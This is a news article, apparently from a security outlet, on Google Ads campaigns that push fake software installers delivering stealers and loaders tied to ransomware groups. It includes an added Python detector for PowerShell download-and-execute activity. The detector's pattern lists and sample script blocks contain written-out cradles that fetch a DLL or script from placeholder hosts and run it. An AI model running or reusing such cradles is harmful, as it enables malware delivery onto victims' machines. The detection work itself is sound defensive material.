Ransomware access brokers use Google ads to breach your network

Written by admin


A threat actor tracked as DEV-0569 is using Google Ads in ongoing and widespread advertising campaigns to distribute malware, steal victims’ passwords, and ultimately breach networks for ransomware attacks.

In the past two weeks, cybersecurity researchers MalwareHunterTeam, Germán Fernández, and Dormann have illustrated how Google search results have become a hotbed of malicious ads that push malware.

These ads pretend to be websites of popular software programs, such as LightShot, Rufus, 7-Zip, FileZilla, LibreOffice, AnyDesk, Awesome Miner, TradingView, WinRAR, and VLC.

Google ads promoting fake software sites drive malware
Source: Researchers/BleepingComputer

By clicking on the ads, visitors are taken to sites that appear as download portals or mirrors of legitimate software sites, as shown below.

Fake Rufus download site
Source: Bleeping Computer

However, clicking the download links on these sites usually downloads an MSI file that installs different malware depending on the campaign.

The list of malware installed in these campaigns so far includes RedLine Stealer, Gozi/Ursnif, Vidar, and potentially Cobalt Strike and ransomware.

While there appear to be many threat actors abusing the Google Ads platform to distribute malware, two campaigns in particular stand out, as their infrastructure has previously been associated with ransomware attacks.

From Google ads to ransomware attacks

In February 2022, researchers uncovered a malware distribution campaign that used SEO poisoning to rank sites impersonating popular software in search results.

If a user were to install the software offered on these pages, it would launch a new malware downloader called BatLoader, which initiates a multi-stage infection process that ultimately gives attackers initial access to victims’ networks.

Later that year, Microsoft reported that the threat actors behind BatLoader, tracked as DEV-0569, had begun using Google ads to promote their malicious sites. Worse yet, Microsoft said that these infections ultimately led to the deployment of real ransomware in breached networks.

“Recent activity of the threat actor Microsoft tracks as DEV-0569, known for distributing various payloads, has led to the deployment of Royal ransomware, which first emerged in September 2022 and is being distributed by multiple threat actors,” Microsoft warned in its report.

Researchers believe that DEV-0569 is an initial access broker that uses its malware distribution system to breach corporate networks. They use this access in their own attacks or sell it to other malicious actors, such as the Royal ransomware gang.

While Microsoft did not share many URLs related to these attacks, other reports from The DFIR Report and eSentire added more information, including the following URLs used in BatLoader campaigns:

ads-check[.]com (Used for tracking Google ads statistics)

Fast forward to January 21, 2023, when CronUp researcher Germán Fernández noted that recent Google ads promoting popular software led to malicious sites using infrastructure operated by the DEV-0569 threat actors.

While the malicious installers in this campaign no longer use BatLoader, as the previous campaigns seen by Microsoft did, they install an information stealer (RedLine Stealer) followed by a malware downloader (Gozi/Ursnif).

In the current campaign, RedLine is used to steal data such as passwords, cookies, and cryptocurrency wallets, while Gozi/Ursnif is used to download more malware.

Fernández told BleepingComputer that he linked these new campaigns to DEV-0569 because they used the same Bitbucket repository and the same ads-check[.]com URL seen in the campaigns reported in November/December 2022.

Fernández did not wait long enough to see if Cobalt Strike and Royal Ransomware would be installed. However, he told BleepingComputer that he believed the hackers would eventually use the Gozi infection to launch Cobalt Strike like BatLoader did in previous campaigns.

Fernández also accessed the DEV-0569 web panel used to track the malware distribution campaign and shared screenshots on Twitter. These screenshots showed the legitimate programs being spoofed and the many victims around the world who were being infected on a daily basis.

When asked how many people were infected by this campaign based on web dashboard statistics, he said that it was only possible to estimate the number.

“The data from the panel is cleaned every day of the campaign, but there is one piece of information that could give us an idea: the correlative ID of the records (it could be an estimated value for the number of victims of this panel; in this case, the latest value today is 63576),” Fernández told BleepingComputer.

Another campaign linked to CLOP ransomware

To make matters worse, Fernández discovered that a different but similar Google ad campaign was using infrastructure previously used by a threat group tracked as TA505, known for distributing CLOP ransomware.

In this Google ad campaign, the threat actors distribute malware via websites pretending to be popular software, including AnyDesk, Slack, Microsoft Teams, TeamViewer, LibreOffice, Adobe, and, strangely, websites for IRS W-9 forms.

A list of domains in this campaign tracked by CronUp is available on this GitHub page.

When the malware from this campaign is installed, it runs a PowerShell script that downloads and runs a DLL from the website download cdn[.]com, which TA505 used previously.

PowerShell script to download malware
Source: Bleeping Computer
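The download-and-run-DLL behaviour described above is something defenders can hunt for in PowerShell Script Block Logging (Windows Event ID 4104). The following is an added example written for this page, not code from the article or from any of the researchers it cites: it scores constructed ScriptBlockText samples by whether they combine a network fetch primitive with an execution primitive and a DLL reference. The sample lines and the `cdn-placeholder.invalid` host are constructed placeholders, not the campaign's indicators.

```python
"""Flag PowerShell download-and-execute cradles in Script Block Logging text.

Added example, not from the article. Input lines are constructed to resemble
the ScriptBlockText field of Windows Event ID 4104 records; all hosts are
placeholders (.invalid TLD), not real indicators.
"""
import re
from dataclasses import dataclass

# Network fetch primitives commonly seen in PowerShell droppers.
DOWNLOAD_PATTERNS = [
    r"Invoke-WebRequest", r"\biwr\b", r"\bwget\b", r"\bcurl\b",
    r"Invoke-RestMethod", r"\birm\b",
    r"Net\.WebClient", r"DownloadFile", r"DownloadString", r"DownloadData",
    r"Start-BitsTransfer",
]
# Ways a fetched payload, a DLL in particular, is commonly executed.
EXECUTE_PATTERNS = [
    r"\brundll32(\.exe)?\b", r"\bregsvr32(\.exe)?\b",
    r"Start-Process", r"Invoke-Expression", r"\biex\b",
    r"\[Reflection\.Assembly\]::Load",
]
DLL_PATTERN = r"\.dll\b"

_download_re = re.compile("|".join(DOWNLOAD_PATTERNS), re.IGNORECASE)
_execute_re = re.compile("|".join(EXECUTE_PATTERNS), re.IGNORECASE)
_dll_re = re.compile(DLL_PATTERN, re.IGNORECASE)
_url_re = re.compile(r"https?://[^\s'\"`;)]+", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    severity: str
    urls: list
    reasons: list


def classify(script_text: str) -> tuple[str, list]:
    """Return (severity, reasons) for one script block.

    high   = download + execute + DLL reference (the pattern the article describes)
    medium = download + execute without a DLL reference
    low    = only one of the primitives (common in legitimate admin scripts)
    none   = nothing of interest
    """
    reasons = []
    if _download_re.search(script_text):
        reasons.append("download primitive")
    if _execute_re.search(script_text):
        reasons.append("execution primitive")
    if _dll_re.search(script_text):
        reasons.append("DLL reference")
    if "download primitive" in reasons and "execution primitive" in reasons:
        severity = "high" if "DLL reference" in reasons else "medium"
    elif reasons:
        severity = "low"
    else:
        severity = "none"
    return severity, reasons


def scan(script_blocks):
    """Classify each script block; keep everything above severity 'none'."""
    findings = []
    for i, text in enumerate(script_blocks, start=1):
        severity, reasons = classify(text)
        if severity == "none":
            continue
        findings.append(Finding(i, severity, _url_re.findall(text), reasons))
    return findings


# Constructed sample script blocks (not real telemetry).
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Windows\\Temp | Remove-Item -Recurse",
    "Invoke-WebRequest https://updates.example.invalid/agent.msi -OutFile C:\\Temp\\agent.msi",
    "$w=New-Object Net.WebClient;$w.DownloadFile('http://cdn-placeholder.invalid/x.dll',"
    "'C:\\Users\\Public\\x.dll');rundll32 C:\\Users\\Public\\x.dll,Start",
    "iex (iwr http://cdn-placeholder.invalid/s.ps1 -UseBasicParsing).Content",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"line {f.line_no}: {f.severity:6} {', '.join(f.reasons)} {f.urls}")
```

The severity tiers matter more than the regexes: `Invoke-WebRequest` alone appears in countless legitimate deployment scripts, so alerting on it in isolation buries the real signal, whereas a fetch immediately followed by `rundll32` or `regsvr32` on a `.dll` is rare in normal administration and is exactly the sequence described for this campaign.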

However, Proofpoint threat researcher Tommy Madjar told BleepingComputer that this domain had changed ownership in the past and that it is unclear whether TA505 is still using it.

Regardless of who owns these domains, the sheer number of malicious Google ads showing up in search results is becoming a huge problem for both consumers and businesses.

With these campaigns being used to gain initial access to corporate networks, they can trigger various attacks such as data theft, ransomware, and even destructive attacks to disrupt a company’s operations.

While BleepingComputer did not contact Google regarding this article, we did contact them last week regarding a similar malware campaign distributed through Google ads.

Google told us at the time that the platform’s policies are designed and enforced to prevent brand spoofing.

“We have strong policies that prohibit ads that try to bypass our app by disguising the identity of the advertiser and posing as other brands, and we vigorously enforce them. We reviewed the ads in question and removed them,” Google told BleepingComputer.

The good news is that Google has been removing ads as they are reported and detected.

The bad news is that threat actors are constantly launching new ad campaigns and new sites, making it one gigantic game of whack-a-mole, and it doesn’t look like Google is winning.
